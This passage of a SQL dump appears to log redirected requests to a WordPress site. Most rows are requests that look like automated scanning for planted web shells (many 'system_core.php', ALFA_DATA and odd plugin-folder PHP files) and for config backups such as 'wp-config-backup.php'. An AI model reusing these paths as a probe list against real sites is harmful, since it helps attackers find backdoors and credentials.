00:00:00',301),(64257,'http://3s-technologies.com.tr/tr/wp-content/plugins/nxploited/class-payment.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/Nxploited/class-payment.php','',2,0,'2026-05-09 02:04:04','0000-00-00 00:00:00',301),(64258,'http://3s-technologies.com.tr/tr/wp-content/home.php',NULL,'http://3s-technologies.com.tr/wp-content/home.php','',2,0,'2026-05-09 02:04:05','0000-00-00 00:00:00',301),(64259,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/skins/lightgray/fonts',NULL,'http://3s-technologies.com.tr/wp-includes/js/tinymce/skins/lightgray/fonts/','',2,0,'2026-05-09 02:04:06','0000-00-00 00:00:00',301),(64260,'http://3s-technologies.com.tr/tr/wp-includes/js/dist/script-modules/block-library/file',NULL,'http://3s-technologies.com.tr/wp-includes/js/dist/script-modules/block-library/file/','',2,0,'2026-05-09 02:04:08','0000-00-00 00:00:00',301),(64261,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-theme-json-resolver-sql.php',NULL,'http://3s-technologies.com.tr/wp-includes/class-wp-theme-json-resolver-sql.php','',2,0,'2026-05-09 02:04:09','0000-00-00 00:00:00',301),(64262,'http://3s-technologies.com.tr/tr/wp-includes/certificates/widgets',NULL,'http://3s-technologies.com.tr/wp-includes/certificates/widgets/','',2,0,'2026-05-09 02:04:10','0000-00-00 00:00:00',301),(64263,'http://3s-technologies.com.tr/tr/wp-includes/id3/interactivity-api',NULL,'http://3s-technologies.com.tr/wp-includes/ID3/interactivity-api/','',2,0,'2026-05-09 02:04:11','0000-00-00 00:00:00',301),(64264,'http://3s-technologies.com.tr/tr/wp-includes/taxonomy-compiler.php',NULL,'http://3s-technologies.com.tr/wp-includes/taxonomy-compiler.php','',2,0,'2026-05-09 02:04:12','0000-00-00 00:00:00',301),(64265,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentyone/assets',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentytwentyone/assets/','',2,0,'2026-05-09 02:04:14','0000-00-00 00:00:00',301),(64266,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/content/type/sniffer.plugin.php',NULL,'http://3s-technologies.com.tr/wp-includes/SimplePie/Content/Type/Sniffer.plugin.php','',1,0,'2026-05-09 02:04:17','0000-00-00 00:00:00',301),(64267,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/nbpmo.php',NULL,'http://3s-technologies.com.tr/wp-admin/css/colors/blue/nbpmo.php','',1,0,'2026-05-09 02:04:19','0000-00-00 00:00:00',301),(64268,'http://3s-technologies.com.tr/tr/wp-includes/system.php',NULL,'http://3s-technologies.com.tr/wp-includes/system.php','',1,0,'2026-05-09 02:04:20','0000-00-00 00:00:00',301),(64269,'http://3s-technologies.com.tr/tr/wp-includes/sc_1.php',NULL,'http://3s-technologies.com.tr/wp-includes/sc_1.php','',1,0,'2026-05-09 02:04:23','0000-00-00 00:00:00',301),(64270,'http://3s-technologies.com.tr/tr/wp-content/gk.php',NULL,'http://3s-technologies.com.tr/wp-content/gk.php','',1,0,'2026-05-09 02:04:24','0000-00-00 00:00:00',301),(64271,'http://3s-technologies.com.tr/tr/about/system_core.php',NULL,'http://3s-technologies.com.tr/about/system_core.php','',1,0,'2026-05-09 02:04:25','0000-00-00 00:00:00',301),(64272,'http://3s-technologies.com.tr/tr/alfa_data/system_core.php',NULL,'http://3s-technologies.com.tr/ALFA_DATA/system_core.php','',1,0,'2026-05-09 02:04:26','0000-00-00 00:00:00',301),(64273,'http://3s-technologies.com.tr/tr/alfa_data/alfacgiapi/system_core.php',NULL,'http://3s-technologies.com.tr/ALFA_DATA/alfacgiapi/system_core.php','',1,0,'2026-05-09 02:04:27','0000-00-00 00:00:00',301),(64274,'http://3s-technologies.com.tr/tr/contact/system_core.php',NULL,'http://3s-technologies.com.tr/contact/system_core.php','',1,0,'2026-05-09 02:04:28','0000-00-00 00:00:00',301),(64275,'http://3s-technologies.com.tr/tr/wp-content/uploads/ai-builder/system_core.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/ai-builder/system_core.php','',1,0,'2026-05-09 02:04:29','0000-00-00 00:00:00',301),(64276,'http://3s-technologies.com.tr/tr/wp-content/uploads/ast-block-templates-json/system_core.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/ast-block-templates-json/system_core.php','',1,0,'2026-05-09 02:04:30','0000-00-00 00:00:00',301),(64277,'http://3s-technologies.com.tr/tr/wp-content/uploads/astra-sites/json/system_core.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/astra-sites/json/system_core.php','',1,0,'2026-05-09 02:04:31','0000-00-00 00:00:00',301),(64278,'http://3s-technologies.com.tr/tr/wp-content/uploads/cartflows-logs/system_core.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/cartflows-logs/system_core.php','',1,0,'2026-05-09 02:04:32','0000-00-00 00:00:00',301),(64279,'http://3s-technologies.com.tr/tr/wp-content/uploads/edd/system_core.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/edd/system_core.php','',1,0,'2026-05-09 02:04:33','0000-00-00 00:00:00',301),(64280,'http://3s-technologies.com.tr/tr/wp-content/uploads/elementor/system_core.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/elementor/system_core.php','',1,0,'2026-05-09 02:04:34','0000-00-00 00:00:00',301),(64281,'http://3s-technologies.com.tr/tr/wp-content/uploads/simply-static/temp-files/system_core.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/simply-static/temp-files/system_core.php','',1,0,'2026-05-09 02:04:34','0000-00-00 00:00:00',301),(64282,'http://3s-technologies.com.tr/tr/wp-content/uploads/st-importer/system_core.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/st-importer/system_core.php','',1,0,'2026-05-09 02:04:35','0000-00-00 00:00:00',301),(64283,'http://3s-technologies.com.tr/tr/wp-content/uploads/system_core.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/system_core.php','',1,0,'2026-05-09 02:04:36','0000-00-00 00:00:00',301),(64284,'http://3s-technologies.com.tr/tr/wp-content/uploads/wc-logs/system_core.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/wc-logs/system_core.php','',1,0,'2026-05-09 02:04:37','0000-00-00 00:00:00',301),(64285,'http://3s-technologies.com.tr/tr/wp-content/uploads/woocommerce_uploads/system_core.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/woocommerce_uploads/system_core.php','',1,0,'2026-05-09 02:04:38','0000-00-00 00:00:00',301),(64286,'http://3s-technologies.com.tr/tr/wp-content/uploads/wpforms/cache/system_core.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/wpforms/cache/system_core.php','',1,0,'2026-05-09 02:04:39','0000-00-00 00:00:00',301),(64287,'http://3s-technologies.com.tr/tr/wp-content/uploads/wp-file-manager-pro',NULL,'http://3s-technologies.com.tr/wp-content/uploads/wp-file-manager-pro/','',1,0,'2026-05-09 02:04:40','0000-00-00 00:00:00',301),(64288,'http://3s-technologies.com.tr/tr/wp-content/uploads/db-status.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/db-status.php','',1,0,'2026-05-09 02:04:41','0000-00-00 00:00:00',301),(64289,'http://3s-technologies.com.tr/tr/wp-content/wp-content/uploads',NULL,'http://3s-technologies.com.tr/wp-content/wp-content/uploads/','',1,0,'2026-05-09 02:04:42','0000-00-00 00:00:00',301),(64290,'http://3s-technologies.com.tr/tr/wp-content/uploads/elementor/css',NULL,'http://3s-technologies.com.tr/wp-content/uploads/elementor/css/','',1,0,'2026-05-09 02:04:43','0000-00-00 00:00:00',301),(64291,'http://3s-technologies.com.tr/tr/wp-content/uploads/wp-file-manager-pro/fm_backup',NULL,'http://3s-technologies.com.tr/wp-content/uploads/wp-file-manager-pro/fm_backup/','',1,0,'2026-05-09 02:04:44','0000-00-00 00:00:00',301),(64292,'http://3s-technologies.com.tr/tr/wp-content/uploads/well-known',NULL,'http://3s-technologies.com.tr/wp-content/uploads/well-known/','',1,0,'2026-05-09 02:04:45','0000-00-00 00:00:00',301),(64293,'http://3s-technologies.com.tr/tr/wp-content/uploads/well-known/pki-validation',NULL,'http://3s-technologies.com.tr/wp-content/uploads/well-known/pki-validation/','',1,0,'2026-05-09 02:04:46','0000-00-00 00:00:00',301),(64294,'http://3s-technologies.com.tr/tr/wp-content/uploads/system.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/system.php','',2,0,'2026-05-09 02:04:47','0000-00-00 00:00:00',301),(64295,'http://3s-technologies.com.tr/tr/wp-content/uploads/panel.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/panel.php','',1,0,'2026-05-09 02:04:48','0000-00-00 00:00:00',301),(64296,'http://3s-technologies.com.tr/tr/wp-content/uploads/home.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/home.php','',1,0,'2026-05-09 02:04:49','0000-00-00 00:00:00',301),(64297,'http://3s-technologies.com.tr/tr/wp-content/uploads/login.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/login.php','',1,0,'2026-05-09 02:04:51','0000-00-00 00:00:00',301),(64298,'http://3s-technologies.com.tr/tr/media/system_core.php',NULL,'http://3s-technologies.com.tr/media/system_core.php','',1,0,'2026-05-09 02:04:52','0000-00-00 00:00:00',301),(64299,'http://3s-technologies.com.tr/tr/wp-includes/css/system_core.php',NULL,'http://3s-technologies.com.tr/wp-includes/css/system_core.php','',1,0,'2026-05-09 02:04:52','0000-00-00 00:00:00',301),(64300,'http://3s-technologies.com.tr/tr/wp-includes/js/system_core.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/system_core.php','',1,0,'2026-05-09 02:04:53','0000-00-00 00:00:00',301),(64301,'http://3s-technologies.com.tr/tr/wp-includes/system_core.php',NULL,'http://3s-technologies.com.tr/wp-includes/system_core.php','',1,0,'2026-05-09 02:04:54','0000-00-00 00:00:00',301),(64302,'http://3s-technologies.com.tr/tr/wp-json/oembed/system_core.php',NULL,'http://3s-technologies.com.tr/wp-json/oembed/system_core.php','',1,0,'2026-05-09 02:04:55','0000-00-00 00:00:00',301),(64303,'http://3s-technologies.com.tr/tr/wp-json/system_core.php',NULL,'http://3s-technologies.com.tr/wp-json/system_core.php','',1,0,'2026-05-09 02:04:56','0000-00-00 00:00:00',301),(64304,'http://3s-technologies.com.tr/tr/wp-json/wp/system_core.php',NULL,'http://3s-technologies.com.tr/wp-json/wp/system_core.php','',1,0,'2026-05-09 02:04:57','0000-00-00 00:00:00',301),(64305,'http://3s-technologies.com.tr/tr/wp-json/wp/v2/system_core.php',NULL,'http://3s-technologies.com.tr/wp-json/wp/v2/system_core.php','',1,0,'2026-05-09 02:04:58','0000-00-00 00:00:00',301),(64306,'http://3s-technologies.com.tr/tr/wp-content/wp-content/wp-config-backup.php',NULL,'http://3s-technologies.com.tr/wp-content/wp-content/wp-config-backup.php','',1,0,'2026-05-09 02:04:59','0000-00-00 00:00:00',301),(64307,'http://3s-technologies.com.tr/tr/wp-content/wp-config.php',NULL,'http://3s-technologies.com.tr/wp-content/wp-config.php','',1,0,'2026-05-09 02:05:00','0000-00-00 00:00:00',301),(64308,'http://3s-technologies.com.tr/tr/wp-content/plugins/js_composer/bak.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/js_composer/bak.php','',1,0,'2026-05-09 02:05:01','0000-00-00 00:00:00',301),(64309,'http://3s-technologies.com.tr/tr/wp-content/plugins/elementor/assets/css/conditionals/system_core.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/elementor/assets/css/conditionals/system_core.php','',1,0,'2026-05-09 02:05:02','0000-00-00 00:00:00',301),(64310,'http://3s-technologies.com.tr/tr/wp-content/plugins/system_core.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/system_core.php','',1,0,'2026-05-09 02:05:03','0000-00-00 00:00:00',301),(64311,'http://3s-technologies.com.tr/tr/wp-content/plugins/wpforms-lite/assets/css/frontend/modern/system_core.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wpforms-lite/assets/css/frontend/modern/system_core.php','',1,0,'2026-05-09 02:05:03','0000-00-00 00:00:00',301),(64312,'http://3s-technologies.com.tr/tr/wp-content/wp-content/plugins/wp-config-backup.php',NULL,'http://3s-technologies.com.tr/wp-content/wp-content/plugins/wp-config-backup.php','',1,0,'2026-05-09 02:05:04','0000-00-00 00:00:00',301),(64313,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-config-backup.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wp-config-backup.php','',1,0,'2026-05-09 02:05:05','0000-00-00 00:00:00',301),(64314,'http://3s-technologies.com.tr/tr/wp-content/plugins/cielhpn',NULL,'http://3s-technologies.com.tr/wp-content/plugins/cielhpn/','',1,0,'2026-05-09 02:05:06','0000-00-00 00:00:00',301),(64315,'http://3s-technologies.com.tr/tr/wp-content/plugins/elementor-pro/modules/loop-filter/data/endpoints/about.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/elementor-pro/modules/loop-filter/data/endpoints/about.php','',1,0,'2026-05-09 02:05:07','0000-00-00 00:00:00',301),(64316,'http://3s-technologies.com.tr/tr/wp-content/plugins/forminator/library/field-autofill-providers/contracts/wp-login.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/forminator/library/field-autofill-providers/contracts/wp-login.php','',1,0,'2026-05-09 02:05:08','0000-00-00 00:00:00',301),(64317,'http://3s-technologies.com.tr/tr/wp-content/plugins/advanced-custom-fields-pro/includes/updater/about.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/advanced-custom-fields-pro/includes/Updater/about.php','',1,0,'2026-05-09 02:05:09','0000-00-00 00:00:00',301),(64318,'http://3s-technologies.com.tr/tr/wp-content/plugins/enhanced-text-widget/analyst/src/class-wp-logo.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/enhanced-text-widget/analyst/src/class-wp-logo.php','',1,0,'2026-05-09 02:05:10','0000-00-00 00:00:00',301),(64319,'http://3s-technologies.com.tr/tr/wp-content/plugins/js_composer/include/classes/vendors/plugins/test.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/js_composer/include/classes/vendors/plugins/test.php','',1,0,'2026-05-09 02:05:11','0000-00-00 00:00:00',301),(64320,'http://3s-technologies.com.tr/tr/wp-content/plugins/revslider/admin/assets/js/plugins/maintenance.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/revslider/admin/assets/js/plugins/maintenance.php','',1,0,'2026-05-09 02:05:12','0000-00-00 00:00:00',301),(64321,'http://3s-technologies.com.tr/tr/wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/wp-mail.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/wp-mail.php','',1,0,'2026-05-09 02:05:13','0000-00-00 00:00:00',301),(64322,'http://3s-technologies.com.tr/tr/wp-content/plugins/sitepress-multilingual-cms/classes/plugins/wp-blog-header.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/sitepress-multilingual-cms/classes/plugins/wp-blog-header.php','',1,0,'2026-05-09 02:05:14','0000-00-00 00:00:00',301),(64323,'http://3s-technologies.com.tr/tr/wp-content/plugins/updraftplus/includes/jstree/themes/wp-activate.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/updraftplus/includes/jstree/themes/wp-activate.php','',1,0,'2026-05-09 02:05:15','0000-00-00 00:00:00',301),(64324,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-file-manager/lib/themes/options.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wp-file-manager/lib/themes/options.php','',1,0,'2026-05-09 02:05:16','0000-00-00 00:00:00',301),(64325,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-blog-header.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wp-blog-header.php','',1,0,'2026-05-09 02:05:16','0000-00-00 00:00:00',301),(64326,'http://3s-technologies.com.tr/tr/wp-content/plugins/elementor/assets/lib/pickr/themes/wp-blog-header.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/elementor/assets/lib/pickr/themes/wp-blog-header.php','',1,0,'2026-05-09 02:05:17','0000-00-00 00:00:00',301),(64327,'http://3s-technologies.com.tr/tr/wp-content/plugins/contact-form-7/uoyaugar.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/contact-form-7/uoyaugar.php','',1,0,'2026-05-09 02:05:18','0000-00-00 00:00:00',301),(64328,'http://3s-technologies.com.tr/tr/wp-content/plugins/check-email/config.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/check-email/config.php','',1,0,'2026-05-09 02:05:19','0000-00-00 00:00:00',301),(64329,'http://3s-technologies.com.tr/tr/wp-content/plugins/file-manager-advanced/config.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/file-manager-advanced/config.php','',1,0,'2026-05-09 02:05:20','0000-00-00 00:00:00',301),(64330,'http://3s-technologies.com.tr/tr/wp-content/plugins/elementor/lndex.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/elementor/lndex.php','',2,0,'2026-05-09 02:05:22','0000-00-00 00:00:00',301),(64331,'http://3s-technologies.com.tr/tr/wp-content/plugins/wordpress-seo/wp-seo-trigger-table.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wordpress-seo/wp-seo-trigger-table.php','',1,0,'2026-05-09 02:05:23','0000-00-00 00:00:00',301),(64332,'http://3s-technologies.com.tr/tr/wp-content/wp-content/plugins/admin.php',NULL,'http://3s-technologies.com.tr/wp-content/wp-content/plugins/admin.php','',1,0,'2026-05-09 02:05:24','0000-00-00 00:00:00',301),(64333,'http://3s-technologies.com.tr/tr/wp-content/plugins/star-addons-for-elementor/includes/class-star-addons-uploads.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/star-addons-for-elementor/includes/class-star-addons-uploads.php','',1,0,'2026-05-09 02:05:25','0000-00-00 00:00:00',301),(64334,'http://3s-technologies.com.tr/tr/wp-content/plugins/contact-form-7-honeypot/includes/rest-api/wp-admin/config.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/contact-form-7-honeypot/includes/rest-api/wp-admin/config.php','',1,0,'2026-05-09 02:05:26','0000-00-00 00:00:00',301),(64335,'http://3s-technologies.com.tr/tr/wp-content/plugins/js_composer/include/classes/vendors/plugins/panel.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/js_composer/include/classes/vendors/plugins/panel.php','',1,0,'2026-05-09 02:05:27','0000-00-00 00:00:00',301),(64336,'http://3s-technologies.com.tr/tr/wp-content/plugins/the-events-calendar/build/css/integrations/plugins/options.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/the-events-calendar/build/css/integrations/plugins/options.php','',1,0,'2026-05-09 02:05:28','0000-00-00 00:00:00',301),(64337,'http://3s-technologies.com.tr/tr/wp-content/plugins/updraftplus/includes/jstree/themes/config.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/updraftplus/includes/jstree/themes/config.php','',1,0,'2026-05-09 02:05:29','0000-00-00 00:00:00',301),(64338,'http://3s-technologies.com.tr/tr/wp-content/plugins/ssss/src.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/ssss/src.php','',1,0,'2026-05-09 02:05:29','0000-00-00 00:00:00',301),(64339,'http://3s-technologies.com.tr/tr/wp-content/plugins/maintenance.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/maintenance.php','',2,0,'2026-05-09 02:05:30','0000-00-00 00:00:00',301),(64340,'http://3s-technologies.com.tr/tr/wp-content/plugins/tiktok-for-business',NULL,'http://3s-technologies.com.tr/wp-content/plugins/tiktok-for-business/','',1,0,'2026-05-09 02:05:31','0000-00-00 00:00:00',301),(64341,'http://3s-technologies.com.tr/tr/wp-content/plugins/contact-form-7/base-theme.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/contact-form-7/base-theme.php','',1,0,'2026-05-09 02:05:32','0000-00-00 00:00:00',301),(64342,'http://3s-technologies.com.tr/tr/wp-content/plugins/hello-plus/classes/ehp-bes.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/hello-plus/classes/ehp-bes.php','',1,0,'2026-05-09 02:05:33','0000-00-00 00:00:00',301),(64343,'http://3s-technologies.com.tr/tr/wp-content/mu-plugins/config.php',NULL,'http://3s-technologies.com.tr/wp-content/mu-plugins/config.php','',1,0,'2026-05-09 02:05:34','0000-00-00 00:00:00',301),(64344,'http://3s-technologies.com.tr/tr/wp-includes/blocks/site-logo/about.php',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/site-logo/about.php','',1,0,'2026-05-09 02:05:36','0000-00-00 00:00:00',301),(64345,'http://3s-technologies.com.tr/tr/wp-content/newfold-page-cachesocial/about.php',NULL,'http://3s-technologies.com.tr/wp-content/newfold-page-cachesocial/about.php','',1,0,'2026-05-09 02:05:37','0000-00-00 00:00:00',301),(64346,'http://3s-technologies.com.tr/tr/wp-content/file61.php',NULL,'http://3s-technologies.com.tr/wp-content/file61.php','',1,0,'2026-05-09 02:05:38','0000-00-00 00:00:00',301),(64347,'http://3s-technologies.com.tr/tr/wp-includes/blocks/comment-author-name/editers.php',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/comment-author-name/editers.php','',1,0,'2026-05-09 02:05:39','0000-00-00 00:00:00',301),(64348,'http://3s-technologies.com.tr/tr/wp-admin/plugin-editor-trigger.php',NULL,'http://3s-technologies.com.tr/wp-admin/plugin-editor-trigger.php','',1,0,'2026-05-09 02:05:40','0000-00-00 00:00:00',301),(64349,'http://3s-technologies.com.tr/tr/wp-includes/blocks/query-pagination-numbers/wp-cron.php',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/query-pagination-numbers/wp-cron.php','',1,0,'2026-05-09 02:05:41','0000-00-00 00:00:00',301),(64350,'http://3s-technologies.com.tr/tr/wp-content/upgrade-temp-backup/media/files/files/cache/ulnc/wbdo',NULL,'http://3s-technologies.com.tr/wp-content/upgrade-temp-backup/media/files/files/cache/ulnc/wbdo/','',1,0,'2026-05-09 02:05:43','0000-00-00 00:00:00',301),(64351,'http://3s-technologies.com.tr/tr/wp-includes/block-bindings/backup/js/build/kys/admin.php',NULL,'http://3s-technologies.com.tr/wp-includes/block-bindings/backup/js/build/kys/admin.php','',1,0,'2026-05-09 02:05:44','0000-00-00 00:00:00',301),(64352,'http://3s-technologies.com.tr/tr/wp-includes/id3/src/v1/dist/build/uols',NULL,'http://3s-technologies.com.tr/wp-includes/ID3/src/v1/dist/build/uols/','',1,0,'2026-05-09 02:05:45','0000-00-00 00:00:00',301),(64353,'http://3s-technologies.com.tr/tr/wp-admin/user/css/cache/piwk/admin.php',NULL,'http://3s-technologies.com.tr/wp-admin/user/css/cache/piwk/admin.php','',1,0,'2026-05-09 02:05:46','0000-00-00 00:00:00',301),(64354,'http://3s-technologies.com.tr/tr/wp-content/languages/plugins/test.php',NULL,'http://3s-technologies.com.tr/wp-content/languages/plugins/test.php','',1,0,'2026-05-09 02:05:46','0000-00-00 00:00:00',301),(64355,'http://3s-technologies.com.tr/tr/wp-content/languages/themes/maintenance.php',NULL,'http://3s-technologies.com.tr/wp-content/languages/themes/maintenance.php','',1,0,'2026-05-09 02:05:47','0000-00-00 00:00:00',301),(64356,'http://3s-technologies.com.tr/tr/wp-content/plugins_new/sitepress-multilingual-cms/classes/plugins/about.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins_new/sitepress-multilingual-cms/classes/plugins/about.php','',1,0,'2026-05-09 02:05:48','0000-00-00 00:00:00',301),(64357,'http://3s-technologies.com.tr/tr/wp-content/plugins_new/wordpress-seo/admin/import/plugins/wp-blog-header.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins_new/wordpress-seo/admin/import/plugins/wp-blog-header.php','',1,0,'2026-05-09 02:05:49','0000-00-00 00:00:00',301),(64358,'http://3s-technologies.com.tr/tr/wp-admin/cs.php',NULL,'http://3s-technologies.com.tr/wp-admin/cs.php','',1,0,'2026-05-09 02:05:50','0000-00-00 00:00:00',301),(64359,'http://3s-technologies.com.tr/tr/wp-admin/ixr/met/uploads',NULL,'http://3s-technologies.com.tr/wp-admin/IXR/met/uploads/','',1,0,'2026-05-09 02:05:51','0000-00-00 00:00:00',301),(64360,'http://3s-technologies.com.tr/tr/wp-includes/assets/wdf.php',NULL,'http://3s-technologies.com.tr/wp-includes/assets/wdf.php','',1,0,'2026-05-09 02:05:52','0000-00-00 00:00:00',301),(64361,'http://3s-technologies.com.tr/tr/wp-includes/phpmailer/koiy.php',NULL,'http://3s-technologies.com.tr/wp-includes/PHPMailer/koiy.php','',1,0,'2026-05-09 02:05:53','0000-00-00 00:00:00',301),(64362,'http://3s-technologies.com.tr/tr/wp-includes/blocks/spacer',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/spacer/','',1,0,'2026-05-09 02:05:55','0000-00-00 00:00:00',301),(64363,'http://3s-technologies.com.tr/tr/wp-content/languages/plugins/media/v3/js/build/icdxa',NULL,'http://3s-technologies.com.tr/wp-content/languages/plugins/media/v3/js/build/icdxa/','',1,0,'2026-05-09 02:05:57','0000-00-00 00:00:00',301),(64364,'http://3s-technologies.com.tr/tr/wp-content/languages/plugins/v3/data/v1/css/jmy/msl',NULL,'http://3s-technologies.com.tr/wp-content/languages/plugins/v3/data/v1/css/jmy/msl/','',1,0,'2026-05-09 02:05:58','0000-00-00 00:00:00',301),(64365,'http://3s-technologies.com.tr/tr/wp-content/upgrade/build/css/cache/img/src/backup/utt/admin.php',NULL,'http://3s-technologies.com.tr/wp-content/upgrade/build/css/cache/img/src/backup/utt/admin.php','',1,0,'2026-05-09 02:05:59','0000-00-00 00:00:00',301),(64366,'http://3s-technologies.com.tr/tr/wp-includes/blocks/social-links/admin.php',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/social-links/admin.php','',1,0,'2026-05-09 02:06:00','0000-00-00 00:00:00',301),(64367,'http://3s-technologies.com.tr/tr/wp-content/themes/astra/assets/css/minified/system_core.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/astra/assets/css/minified/system_core.php','',1,0,'2026-05-09 02:06:02','0000-00-00 00:00:00',301),(64368,'http://3s-technologies.com.tr/tr/wp-content/themes/system_core.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/system_core.php','',1,0,'2026-05-09 02:06:03','0000-00-00 00:00:00',301),(64369,'http://3s-technologies.com.tr/tr/wp-content/wp-content/themes/wp-config-backup.php',NULL,'http://3s-technologies.com.tr/wp-content/wp-content/themes/wp-config-backup.php','',1,0,'2026-05-09 02:06:04','0000-00-00 00:00:00',301),(64370,'http://3s-technologies.com.tr/tr/wp-content/themes/theme/about.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/theme/about.php','',1,0,'2026-05-09 02:06:05','0000-00-00 00:00:00',301),(64371,'http://3s-technologies.com.tr/tr/wp-content/themes/sinatra/inc/customizer/controls/color/about.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/sinatra/inc/customizer/controls/color/about.php','',1,0,'2026-05-09 02:06:06','0000-00-00 00:00:00',301),(64372,'http://3s-technologies.com.tr/tr/wp-content/themes/blocksy/inc/panel-builder/footer/widget-area-3',NULL,'http://3s-technologies.com.tr/wp-content/themes/blocksy/inc/panel-builder/footer/widget-area-3/','',1,0,'2026-05-09 02:06:07','0000-00-00 00:00:00',301),(64373,'http://3s-technologies.com.tr/tr/wp-content/themes/crio/woocommerce/notices',NULL,'http://3s-technologies.com.tr/wp-content/themes/crio/woocommerce/notices/','',1,0,'2026-05-09 02:06:08','0000-00-00 00:00:00',301),(64374,'http://3s-technologies.com.tr/tr/wp-content/themes/hestia/inc/views/blog',NULL,'http://3s-technologies.com.tr/wp-content/themes/hestia/inc/views/blog/','',1,0,'2026-05-09 02:06:08','0000-00-00 00:00:00',301),(64375,'http://3s-technologies.com.tr/tr/wp-content/themes/fortified-child/docs/js/omelv',NULL,'http://3s-technologies.com.tr/wp-content/themes/fortified-child/docs/js/omelv/','',1,0,'2026-05-09 02:06:09','0000-00-00 00:00:00',301),(64376,'http://3s-technologies.com.tr/tr/wp-content/themes/maintenance.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/maintenance.php','',1,0,'2026-05-09 02:06:10','0000-00-00 00:00:00',301),(64377,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentyone/content-index.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentytwentyone/content-index.php','',1,0,'2026-05-09 02:06:11','0000-00-00 00:00:00',301),(64378,'http://3s-technologies.com.tr/tr/wp-content/themes/proton/content-index.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/proton/content-index.php','',1,0,'2026-05-09 02:06:12','0000-00-00 00:00:00',301),(64379,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentythree/patterns',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentytwentythree/patterns/','',1,0,'2026-05-09 02:06:13','0000-00-00 00:00:00',301),(64380,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentytwo/assets/fonts/inter',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentytwentytwo/assets/fonts/inter/','',1,0,'2026-05-09 02:06:14','0000-00-00 00:00:00',301),(64381,'http://3s-technologies.com.tr/tr/wp-content/themes/yootheme/content-index.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/yootheme/content-index.php','',1,0,'2026-05-09 02:06:15','0000-00-00 00:00:00',301),(64382,'http://3s-technologies.com.tr/tr/wp-content/themes/security.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/security.php','',1,0,'2026-05-09 02:06:16','0000-00-00 00:00:00',301),(64383,'http://3s-technologies.com.tr/tr/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/promobox',NULL,'http://3s-technologies.com.tr/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/promobox/','',1,0,'2026-05-09 02:06:17','0000-00-00 